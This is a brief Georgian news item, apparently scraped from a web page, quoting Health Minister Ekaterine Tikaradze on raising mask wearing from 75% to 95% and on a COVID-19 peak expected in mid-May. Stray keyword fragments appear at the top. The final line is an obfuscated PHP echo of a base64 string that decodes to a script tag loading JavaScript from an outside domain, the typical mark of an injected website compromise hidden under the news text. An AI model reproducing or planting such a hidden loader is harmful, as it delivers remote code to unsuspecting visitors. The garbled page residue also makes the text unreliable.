celsiusi
ავერსი შნაიდერი
როგორც ჯანდაცვის მინისტრი ეკატერინე ტიკარაძე აცხადებს, აუცილებელია, ნიღბების გამოყენება და სოციალური დისტანცირება. მინისტრის  ინფორმაციით, მონაცემებს შედეგად, დღეისთვის ნიღბის ტარების მაჩვენებელი გაზრდილია 75%-მდე, თუმცა ეს საკმარისი არ არის და მნიშვნელოვანია, რომ ის სულ მცირე 95%-მდე გაიზარდოს.
 
"ლოკალურ შეზღუდვებთან დაკავშირებით საბჭო მოგვიანებით იმსჯელებს, თუმცა ამასთან მიმართებითაც გვაქვს გარკვეული ხედვები და მნიშვნელოვანია, პირველ რიგში, ხელი შევუწყოთ პრევენციას, რომ არ მივმართოთ რადიკალურ ზომებს. ინფიცირების იმ რიცხვებით, რაც გვაქვს, პიკური მაჩვენებლები მოსალოდნელია მაისის შუა რიცხვებში, თუმცა, რა თქმა უნდა, თუ საზოგადოება და სახელმწიფო ერთიანად იმოქმედებენ, რომ მოხდეს ინფექციის დროული შეკავება, გვაქვს რესურსი, რომ არ მივიღოთ პიკური მაჩვენებელი და დღეს არსებული მონაცემებით, შევძლოთ ვირუსის პროცესის დროში თავისი რიცხობრიობით მართვა", - განაცხადა ეკატერინე ტიკარაძემ.
 
 
 
1100
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");